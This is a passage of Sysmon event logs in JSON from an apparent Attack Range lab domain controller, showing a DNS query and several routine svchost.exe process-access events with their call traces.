{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":6070,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:28.071\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nProcessId: 1220\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:56:28.071","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 